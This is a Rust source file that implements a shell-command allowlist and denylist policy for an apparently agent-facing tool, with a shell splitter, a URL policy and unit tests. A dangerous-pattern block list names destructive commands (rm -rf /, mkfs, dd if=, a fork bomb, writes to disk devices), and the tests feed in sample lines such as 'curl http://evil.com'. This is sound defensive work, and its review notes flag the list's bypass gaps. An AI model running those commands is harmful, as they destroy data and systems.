1use std::collections::HashSet;
14
/// Selects how [`CommandPolicy`] decides whether a command may run.
///
/// In both modes the policy's dangerous patterns are checked first; the mode only selects the
/// second, mode-specific check.
#[non_exhaustive]
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Hash)]
pub enum PolicyMode {
    /// A command is accepted only if every sub-command starts with an allow-listed program.
    #[default]
    Allowlist,
    /// A command is accepted unless it contains one of the deny-listed patterns.
    Denylist,
}
27
/// Why [`CommandPolicy::validate`] rejected a command.
///
/// Every variant carries the full command exactly as it was submitted.
#[non_exhaustive]
#[derive(Debug, Clone, PartialEq, Eq)]
pub enum CommandPolicyError {
    /// Allowlist mode: some sub-command starts with a program that is not allow-listed.
    NotAllowed { command: String },
    /// Denylist mode: the command contains `pattern` from the denylist.
    Blocked { command: String, pattern: String },
    /// Any mode: the command contains `pattern` from the dangerous-pattern list.
    DangerousPattern { command: String, pattern: String },
}

impl std::fmt::Display for CommandPolicyError {
    /// Writes a single-line, human-readable reason for the rejection.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        match self {
            CommandPolicyError::NotAllowed { command } => {
                write!(f, "command not allowed: {command}")
            }
            CommandPolicyError::Blocked { command, pattern } => write!(
                f,
                "command blocked: {command} (matched pattern: {pattern})"
            ),
            CommandPolicyError::DangerousPattern { command, pattern } => write!(
                f,
                "dangerous command: {command} (matched pattern: {pattern})"
            ),
        }
    }
}

/// No underlying cause is attached; the `Display` text is the whole message.
impl std::error::Error for CommandPolicyError {}
58
59#[derive(Debug, Clone)]
66pub struct CommandPolicy {
67 pub mode: PolicyMode,
69 pub allowlist: HashSet<String>,
71 pub denylist: Vec<String>,
73 pub dangerous_patterns: Vec<String>,
75}
76
/// Program names accepted by [`CommandPolicy::safe_defaults`] in allowlist mode.
///
/// NOTE(review): several entries (`env`, `xargs`, `command`, `source`, `find`, `npx`, `node`,
/// `python`, `python3`, ...) can themselves start other programs. So checking only the first
/// token against this list does not confine what ultimately runs. Confirm this trade-off is
/// intended.
pub const DEFAULT_COMMAND_ALLOWLIST: &[&str] = &[
    // Viewing, listing and searching files.
    "echo", "cat", "ls", "pwd", "head", "tail", "wc", "grep", "find", "sort", "uniq", "diff",
    // Environment and file information.
    "date", "env", "true", "false", "test", "which", "basename", "dirname", "stat", "file",
    "readlink",
    // Text processing.
    "sed", "awk", "cut", "tr", "tee", "xargs",
    // File manipulation.
    "mkdir", "cp", "mv", "touch", "rm", "ln", "chmod",
    // Shell builtins.
    "cd", "export", "source", "type", "command",
    // Development toolchains.
    "git", "cargo", "rustc", "npm", "npx", "node", "python", "python3",
    // Project CLIs.
    "weft", "claude-flow",
];
98
/// Substrings that `CommandPolicy::validate` rejects in every mode.
///
/// Matching is a case-insensitive substring test on the whitespace-normalised command. These are
/// heuristics: an equivalent command spelled differently (e.g. `rm -fr /`) is not caught. The
/// order only decides which pattern is reported when several match.
pub const DEFAULT_DANGEROUS_PATTERNS: &[&str] = &[
    "rm -rf /",      // recursive delete from the filesystem root
    "sudo ",         // privilege escalation
    "mkfs",          // building a filesystem over a device
    "dd if=",        // raw block copies
    ":(){ :|:& };:", // bash fork bomb
    "chmod 777 /",   // world-writable permissions from the root
    "> /dev/sd",     // redirecting output onto a disk device
    "shutdown",      // power-state changes
    "reboot",
    "poweroff",
    "format c:",     // Windows drive format
];
113
114impl Default for CommandPolicy {
115 fn default() -> Self {
116 Self::safe_defaults()
117 }
118}
119
120impl CommandPolicy {
121 pub fn safe_defaults() -> Self {
128 let allowlist = DEFAULT_COMMAND_ALLOWLIST
129 .iter()
130 .map(|s| (*s).to_string())
131 .collect();
132 let dangerous_patterns: Vec<String> = DEFAULT_DANGEROUS_PATTERNS
133 .iter()
134 .map(|s| (*s).to_string())
135 .collect();
136 let denylist = dangerous_patterns.clone();
137
138 Self {
139 mode: PolicyMode::Allowlist,
140 allowlist,
141 denylist,
142 dangerous_patterns,
143 }
144 }
145
146 pub fn new(mode: PolicyMode, allowlist: HashSet<String>, denylist: Vec<String>) -> Self {
148 let dangerous_patterns: Vec<String> = DEFAULT_DANGEROUS_PATTERNS
149 .iter()
150 .map(|s| (*s).to_string())
151 .collect();
152
153 Self {
154 mode,
155 allowlist,
156 denylist,
157 dangerous_patterns,
158 }
159 }
160
161 pub fn validate(&self, command: &str) -> Result<(), CommandPolicyError> {
169 let normalized: String = command
172 .chars()
173 .map(|c| if c.is_whitespace() { ' ' } else { c })
174 .collect();
175 let lower = normalized.to_lowercase();
176
177 for pattern in &self.dangerous_patterns {
179 if lower.contains(&pattern.to_lowercase()) {
180 return Err(CommandPolicyError::DangerousPattern {
181 command: command.to_string(),
182 pattern: pattern.clone(),
183 });
184 }
185 }
186
187 match self.mode {
189 PolicyMode::Allowlist => {
190 for sub in split_shell_commands(command) {
194 let token = extract_first_token(sub);
195 if !self.allowlist.contains(token) {
196 return Err(CommandPolicyError::NotAllowed {
197 command: command.to_string(),
198 });
199 }
200 }
201 }
202 PolicyMode::Denylist => {
203 for pattern in &self.denylist {
204 if lower.contains(&pattern.to_lowercase()) {
205 return Err(CommandPolicyError::Blocked {
206 command: command.to_string(),
207 pattern: pattern.clone(),
208 });
209 }
210 }
211 }
212 }
213
214 Ok(())
215 }
216}
217
/// Splits a shell command line into the simple commands it would run.
///
/// Recognised separators:
/// - the control operators `&&`, `||`, `;`, `|`, newline, and a lone `&` (background job).
///   An `&` that belongs to a redirection (`2>&1`, `>&2`, `<&3`, `&>file`, `&>>file`) is kept
///   as ordinary text;
/// - command and process substitution. Each backtick, and each `$(`, `<(` or `>(`, starts a
///   nested command. The `)` that closes such a substitution is also a separator. A `)`
///   outside a substitution is ordinary text.
///
/// Each piece is trimmed, and empty pieces are dropped. Quoting and escaping are not
/// understood, so separators inside quotes also split. Splitting only ever adds pieces for a
/// caller to check, which errs towards rejecting rather than accepting.
pub fn split_shell_commands(command: &str) -> Vec<&str> {
    /// Pushes `piece`, trimmed, onto `parts` unless it is empty.
    fn push_trimmed<'a>(parts: &mut Vec<&'a str>, piece: &'a str) {
        let piece = piece.trim();
        if !piece.is_empty() {
            parts.push(piece);
        }
    }

    let bytes = command.as_bytes();
    let mut parts = Vec::new();
    let mut start = 0;
    let mut i = 0;
    // Number of currently open `$(` / `<(` / `>(` substitutions.
    let mut subst_depth: usize = 0;

    while i < bytes.len() {
        let current = bytes[i];
        let next = bytes.get(i + 1).copied();
        let prev = i.checked_sub(1).map(|p| bytes[p]);

        // Width in bytes of the separator starting at `i`, or 0 for ordinary text. All
        // separators are ASCII, so slicing at these offsets is always on a char boundary.
        let sep_len = match (current, next) {
            (b'&', Some(b'&')) | (b'|', Some(b'|')) => 2,
            (b'$' | b'<' | b'>', Some(b'(')) => {
                subst_depth += 1;
                2
            }
            (b';' | b'|' | b'\n' | b'`', _) => 1,
            (b')', _) if subst_depth > 0 => {
                subst_depth -= 1;
                1
            }
            // Background `&`, but not `>&`/`<&` (fd duplication) or `&>` (redirect both).
            (b'&', _) if !matches!(prev, Some(b'>' | b'<')) && next != Some(b'>') => 1,
            _ => 0,
        };

        if sep_len == 0 {
            i += 1;
            continue;
        }

        push_trimmed(&mut parts, &command[start..i]);
        i += sep_len;
        start = i;
    }

    push_trimmed(&mut parts, &command[start..]);
    parts
}
269
/// Returns the program name of a simple command.
///
/// This is the first whitespace-delimited token with any directory prefix removed
/// (`/usr/bin/ls -la` → `ls`). Returns `""` for empty or whitespace-only input, and also when
/// the token itself ends in `/`.
///
/// NOTE(review): the directory is discarded, so `./ls` and `/tmp/x/ls` yield the same name as
/// `/usr/bin/ls`. A caller comparing the result against an allowlist therefore accepts an
/// allow-listed name from any directory. Confirm this is acceptable.
pub fn extract_first_token(command: &str) -> &str {
    command.split_whitespace().next().map_or("", |program| {
        program
            .rsplit_once('/')
            .map_or(program, |(_directory, name)| name)
    })
}
295
/// Settings for URL checks.
///
/// Only the data and constructors are defined here. The code that enforces these settings is
/// not part of this section, so the exact semantics of each field should be confirmed there.
#[derive(Debug, Clone)]
pub struct UrlPolicy {
    /// Whether URL checks apply at all. [`UrlPolicy::permissive`] turns this off.
    pub enabled: bool,
    /// Presumably permits private/internal network addresses when `true`. TODO: confirm
    /// against the enforcing code.
    pub allow_private: bool,
    /// Domains explicitly allowed. Matching rules are defined by the enforcing code.
    pub allowed_domains: HashSet<String>,
    /// Domains explicitly blocked. Matching rules are defined by the enforcing code.
    pub blocked_domains: HashSet<String>,
}

impl Default for UrlPolicy {
    /// Checks enabled, private addresses disallowed, and both domain sets empty.
    fn default() -> Self {
        Self::new(true, false, HashSet::new(), HashSet::new())
    }
}

impl UrlPolicy {
    /// Builds a policy from explicit values for every field.
    pub fn new(
        enabled: bool,
        allow_private: bool,
        allowed_domains: HashSet<String>,
        blocked_domains: HashSet<String>,
    ) -> Self {
        UrlPolicy {
            allowed_domains,
            blocked_domains,
            enabled,
            allow_private,
        }
    }

    /// The default policy with `enabled` switched off.
    pub fn permissive() -> Self {
        let mut policy = Self::default();
        policy.enabled = false;
        policy
    }
}
355
#[cfg(test)]
mod tests {
    use super::*;

    // ── CommandPolicy construction ─────────────────────────────────────

    #[test]
    fn command_policy_safe_defaults() {
        let policy = CommandPolicy::safe_defaults();
        assert_eq!(policy.mode, PolicyMode::Allowlist);
        assert!(policy.allowlist.contains("echo"));
        assert!(policy.allowlist.contains("ls"));
        assert!(!policy.dangerous_patterns.is_empty());
    }

    #[test]
    fn command_policy_new() {
        let allowlist = HashSet::from(["curl".to_string()]);
        let denylist = vec!["rm".to_string()];
        let policy = CommandPolicy::new(PolicyMode::Denylist, allowlist, denylist);
        assert_eq!(policy.mode, PolicyMode::Denylist);
        assert!(policy.allowlist.contains("curl"));
        assert_eq!(policy.denylist, vec!["rm".to_string()]);
    }

    #[test]
    fn default_is_safe_defaults() {
        let default = CommandPolicy::default();
        let safe = CommandPolicy::safe_defaults();
        assert_eq!(default.mode, safe.mode);
        assert_eq!(default.allowlist, safe.allowlist);
        assert_eq!(default.denylist, safe.denylist);
        assert_eq!(default.dangerous_patterns, safe.dangerous_patterns);
    }

    #[test]
    fn safe_defaults_denylist_mirrors_dangerous_patterns() {
        let policy = CommandPolicy::safe_defaults();
        assert_eq!(policy.denylist, policy.dangerous_patterns);
    }

    #[test]
    fn new_seeds_default_dangerous_patterns() {
        let policy = CommandPolicy::new(PolicyMode::Denylist, HashSet::new(), Vec::new());
        assert_eq!(
            policy.dangerous_patterns.len(),
            DEFAULT_DANGEROUS_PATTERNS.len()
        );
    }

    // ── CommandPolicy::validate ────────────────────────────────────────

    #[test]
    fn allowlist_permits_echo() {
        let policy = CommandPolicy::safe_defaults();
        assert!(policy.validate("echo hello").is_ok());
    }

    #[test]
    fn allowlist_rejects_curl() {
        let policy = CommandPolicy::safe_defaults();
        let err = policy.validate("curl http://evil.com").unwrap_err();
        assert!(matches!(err, CommandPolicyError::NotAllowed { .. }));
    }

    #[test]
    fn allowlist_match_is_case_sensitive() {
        let policy = CommandPolicy::safe_defaults();
        assert!(matches!(
            policy.validate("ECHO hi"),
            Err(CommandPolicyError::NotAllowed { .. })
        ));
    }

    #[test]
    fn allowlist_accepts_absolute_path_to_allowed_program() {
        let policy = CommandPolicy::safe_defaults();
        assert!(policy.validate("/usr/bin/ls -la").is_ok());
    }

    #[test]
    fn dangerous_patterns_always_checked() {
        let policy = CommandPolicy::safe_defaults();
        let err = policy.validate("echo; rm -rf /").unwrap_err();
        assert!(matches!(err, CommandPolicyError::DangerousPattern { .. }));
    }

    #[test]
    fn dangerous_patterns_checked_in_denylist_mode() {
        let policy = CommandPolicy::new(PolicyMode::Denylist, HashSet::new(), Vec::new());
        let err = policy.validate("sudo ls").unwrap_err();
        assert_eq!(
            err,
            CommandPolicyError::DangerousPattern {
                command: "sudo ls".into(),
                pattern: "sudo ".into(),
            }
        );
    }

    #[test]
    fn denylist_mode_permits_unlisted() {
        let mut policy = CommandPolicy::safe_defaults();
        policy.mode = PolicyMode::Denylist;
        assert!(policy.validate("curl http://safe.com").is_ok());
    }

    #[test]
    fn denylist_mode_blocks_listed_pattern_case_insensitively() {
        let policy = CommandPolicy::new(
            PolicyMode::Denylist,
            HashSet::new(),
            vec!["curl".to_string()],
        );
        let err = policy.validate("CURL http://x").unwrap_err();
        assert_eq!(
            err,
            CommandPolicyError::Blocked {
                command: "CURL http://x".into(),
                pattern: "curl".into(),
            }
        );
    }

    #[test]
    fn tab_normalized_to_space() {
        let policy = CommandPolicy::safe_defaults();
        let result = policy.validate("sudo\tsomething");
        assert!(result.is_err());
    }

    // ── extract_first_token ────────────────────────────────────────────

    #[test]
    fn extract_token_simple() {
        assert_eq!(extract_first_token("echo foo"), "echo");
    }

    #[test]
    fn extract_token_with_path() {
        assert_eq!(extract_first_token("/usr/bin/ls -la"), "ls");
    }

    #[test]
    fn extract_token_empty() {
        assert_eq!(extract_first_token(""), "");
    }

    #[test]
    fn extract_token_whitespace_only() {
        assert_eq!(extract_first_token(" \t "), "");
    }

    // ── UrlPolicy ──────────────────────────────────────────────────────

    #[test]
    fn url_policy_default() {
        let policy = UrlPolicy::default();
        assert!(policy.enabled);
        assert!(!policy.allow_private);
        assert!(policy.allowed_domains.is_empty());
        assert!(policy.blocked_domains.is_empty());
    }

    #[test]
    fn url_policy_permissive() {
        let policy = UrlPolicy::permissive();
        assert!(!policy.enabled);
    }

    #[test]
    fn url_policy_new() {
        let allowed = HashSet::from(["internal.corp".to_string()]);
        let blocked = HashSet::from(["evil.com".to_string()]);
        let policy = UrlPolicy::new(true, true, allowed, blocked);
        assert!(policy.enabled);
        assert!(policy.allow_private);
        assert!(policy.allowed_domains.contains("internal.corp"));
        assert!(policy.blocked_domains.contains("evil.com"));
    }

    // ── PolicyMode / CommandPolicyError ────────────────────────────────

    #[test]
    fn policy_mode_default_is_allowlist() {
        assert_eq!(PolicyMode::default(), PolicyMode::Allowlist);
    }

    #[test]
    fn command_policy_error_display() {
        let err = CommandPolicyError::NotAllowed {
            command: "curl".into(),
        };
        assert_eq!(err.to_string(), "command not allowed: curl");
    }

    #[test]
    fn command_policy_error_display_with_pattern() {
        let blocked = CommandPolicyError::Blocked {
            command: "rm x".into(),
            pattern: "rm".into(),
        };
        assert_eq!(
            blocked.to_string(),
            "command blocked: rm x (matched pattern: rm)"
        );
        let dangerous = CommandPolicyError::DangerousPattern {
            command: "sudo ls".into(),
            pattern: "sudo ".into(),
        };
        assert_eq!(
            dangerous.to_string(),
            "dangerous command: sudo ls (matched pattern: sudo )"
        );
    }

    // ── split_shell_commands ───────────────────────────────────────────

    #[test]
    fn split_simple_command() {
        assert_eq!(split_shell_commands("echo hello"), vec!["echo hello"]);
    }

    #[test]
    fn split_and_operator() {
        assert_eq!(
            split_shell_commands("cd foo && claude-flow mcp status"),
            vec!["cd foo", "claude-flow mcp status"]
        );
    }

    #[test]
    fn split_or_operator() {
        assert_eq!(
            split_shell_commands("ls /tmp || echo fallback"),
            vec!["ls /tmp", "echo fallback"]
        );
    }

    #[test]
    fn split_semicolon() {
        assert_eq!(
            split_shell_commands("echo a; echo b"),
            vec!["echo a", "echo b"]
        );
    }

    #[test]
    fn split_pipe() {
        assert_eq!(
            split_shell_commands("cat file | grep pattern"),
            vec!["cat file", "grep pattern"]
        );
    }

    #[test]
    fn split_mixed_operators() {
        assert_eq!(
            split_shell_commands("cd dir && git status | grep modified; echo done"),
            vec!["cd dir", "git status", "grep modified", "echo done"]
        );
    }

    #[test]
    fn split_empty() {
        let result: Vec<&str> = split_shell_commands("");
        assert!(result.is_empty());
    }

    #[test]
    fn split_skips_empty_segments() {
        assert_eq!(split_shell_commands("; ; echo a ;"), vec!["echo a"]);
        assert_eq!(split_shell_commands("echo a &&"), vec!["echo a"]);
    }

    // ── Compound commands through validate ─────────────────────────────

    #[test]
    fn allowlist_permits_compound_when_all_allowed() {
        let policy = CommandPolicy::safe_defaults();
        assert!(policy.validate("cd clawft && claude-flow mcp status").is_ok());
    }

    #[test]
    fn allowlist_rejects_compound_when_any_disallowed() {
        let policy = CommandPolicy::safe_defaults();
        let err = policy.validate("echo hi && curl http://evil.com").unwrap_err();
        assert!(matches!(err, CommandPolicyError::NotAllowed { .. }));
    }

    #[test]
    fn allowlist_rejects_disallowed_program_after_pipe() {
        let policy = CommandPolicy::safe_defaults();
        let err = policy.validate("cat file | curl http://evil.com").unwrap_err();
        assert!(matches!(err, CommandPolicyError::NotAllowed { .. }));
    }

    #[test]
    fn allowlist_permits_pipe_chain() {
        let policy = CommandPolicy::safe_defaults();
        assert!(policy.validate("cat file | grep pattern | sort").is_ok());
    }

    #[test]
    fn allowlist_permits_dev_tools() {
        let policy = CommandPolicy::safe_defaults();
        assert!(policy.validate("git status").is_ok());
        assert!(policy.validate("cargo build").is_ok());
        assert!(policy.validate("npx @claude-flow/cli@latest").is_ok());
        assert!(policy.validate("weft agent list").is_ok());
        assert!(policy.validate("npm install").is_ok());
    }

    #[test]
    fn dangerous_pattern_still_blocks_compound() {
        let policy = CommandPolicy::safe_defaults();
        let err = policy.validate("echo hi && rm -rf /").unwrap_err();
        assert!(matches!(err, CommandPolicyError::DangerousPattern { .. }));
    }
}